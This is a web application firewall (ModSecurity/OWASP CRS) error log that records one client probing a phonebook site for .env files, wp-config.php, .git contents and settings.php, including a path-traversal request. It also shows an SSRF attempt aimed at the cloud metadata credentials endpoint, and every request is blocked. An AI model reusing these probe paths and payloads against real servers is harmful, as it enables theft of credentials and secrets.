[Mon May 11 15:23:08.681791 2026] [security2:error] [pid 1319885:tid 1319900] [client 195.178.110.133:46012] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYPFchVQ3tCn0m9OpY-wAAAQk"]
[Mon May 11 15:23:08.682264 2026] [security2:error] [pid 1319885:tid 1319900] [client 195.178.110.133:46012] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYPFchVQ3tCn0m9OpY-wAAAQk"]
[Mon May 11 15:23:08.682547 2026] [security2:error] [pid 1319998:tid 1320009] [client 195.178.110.133:46102] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYPKt2WtvoFr7xvGzUPAAAAIk"]
[Mon May 11 15:23:08.682587 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYPOJEyNRN152ArOSMpQAAAFU"]
[Mon May 11 15:23:08.682659 2026] [security2:error] [pid 1319998:tid 1320009] [client 195.178.110.133:46102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYPKt2WtvoFr7xvGzUPAAAAIk"]
[Mon May 11 15:23:08.682695 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYPOJEyNRN152ArOSMpQAAAFU"]
[Mon May 11 15:23:08.682705 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:46002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYPKO9RdIr1DwxYR2SlgAAAME"]
[Mon May 11 15:23:08.682833 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:46002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYPKO9RdIr1DwxYR2SlgAAAME"]
[Mon May 11 15:23:08.682870 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYPOJEyNRN152ArOSMpQAAAFU"]
[Mon May 11 15:23:08.682929 2026] [security2:error] [pid 1319998:tid 1320009] [client 195.178.110.133:46102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYPKt2WtvoFr7xvGzUPAAAAIk"]
[Mon May 11 15:23:08.683036 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:46002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYPKO9RdIr1DwxYR2SlgAAAME"]
[Mon May 11 15:23:08.687588 2026] [security2:error] [pid 1319886:tid 1319913] [client 195.178.110.133:46126] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPKy-5-wpj6Sx56aYpAAAAAk"]
[Mon May 11 15:23:08.687709 2026] [security2:error] [pid 1319886:tid 1319913] [client 195.178.110.133:46126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPKy-5-wpj6Sx56aYpAAAAAk"]
[Mon May 11 15:23:08.687907 2026] [security2:error] [pid 1319886:tid 1319913] [client 195.178.110.133:46126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPKy-5-wpj6Sx56aYpAAAAAk"]
[Mon May 11 15:23:08.688061 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:46084] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYPKy-5-wpj6Sx56aYpQAAAAY"]
[Mon May 11 15:23:08.688182 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:46084] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYPKy-5-wpj6Sx56aYpQAAAAY"]
[Mon May 11 15:23:08.688360 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:46084] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYPKy-5-wpj6Sx56aYpQAAAAY"]
[Mon May 11 15:23:08.688473 2026] [security2:error] [pid 1319953:tid 1319970] [client 195.178.110.133:46046] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYPOSQ-m-m0ukSShuBxwAAAU8"]
[Mon May 11 15:23:08.688588 2026] [security2:error] [pid 1319953:tid 1319970] [client 195.178.110.133:46046] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYPOSQ-m-m0ukSShuBxwAAAU8"]
[Mon May 11 15:23:08.688511 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:46030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYPOJEyNRN152ArOSMpgAAAFQ"]
[Mon May 11 15:23:08.688743 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:46030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYPOJEyNRN152ArOSMpgAAAFQ"]
[Mon May 11 15:23:08.688761 2026] [security2:error] [pid 1319953:tid 1319970] [client 195.178.110.133:46046] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYPOSQ-m-m0ukSShuBxwAAAU8"]
[Mon May 11 15:23:08.688961 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:46030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYPOJEyNRN152ArOSMpgAAAFQ"]
[Mon May 11 15:23:08.689586 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPKt2WtvoFr7xvGzUPQAAAIo"]
[Mon May 11 15:23:08.690243 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPKt2WtvoFr7xvGzUPQAAAIo"]
[Mon May 11 15:23:08.690425 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPKt2WtvoFr7xvGzUPQAAAIo"]
[Mon May 11 15:23:08.690683 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:46112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYPKt2WtvoFr7xvGzUPgAAAIs"]
[Mon May 11 15:23:08.691020 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:46112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYPKt2WtvoFr7xvGzUPgAAAIs"]
[Mon May 11 15:23:08.691227 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:46112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYPKt2WtvoFr7xvGzUPgAAAIs"]
[Mon May 11 15:23:08.692028 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:46078] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYPKO9RdIr1DwxYR2SlwAAAMY"]
[Mon May 11 15:23:08.692140 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:46078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYPKO9RdIr1DwxYR2SlwAAAMY"]
[Mon May 11 15:23:08.692323 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:46078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYPKO9RdIr1DwxYR2SlwAAAMY"]
[Mon May 11 15:23:08.692385 2026] [security2:error] [pid 1320674:tid 1320701] [client 195.178.110.133:46150] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPKO9RdIr1DwxYR2SmAAAAMs"]
[Mon May 11 15:23:08.692439 2026] [security2:error] [pid 1320674:tid 1320701] [client 195.178.110.133:46150] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPKO9RdIr1DwxYR2SmAAAAMs"]
[Mon May 11 15:23:08.692538 2026] [security2:error] [pid 1320674:tid 1320701] [client 195.178.110.133:46150] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPKO9RdIr1DwxYR2SmAAAAMs"]
[Mon May 11 15:23:08.692823 2026] [security2:error] [pid 1320674:tid 1320701] [client 195.178.110.133:46150] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPKO9RdIr1DwxYR2SmAAAAMs"]
[Mon May 11 15:23:08.707024 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPKt2WtvoFr7xvGzUQAAAAIo"]
[Mon May 11 15:23:08.707590 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPKt2WtvoFr7xvGzUQAAAAIo"]
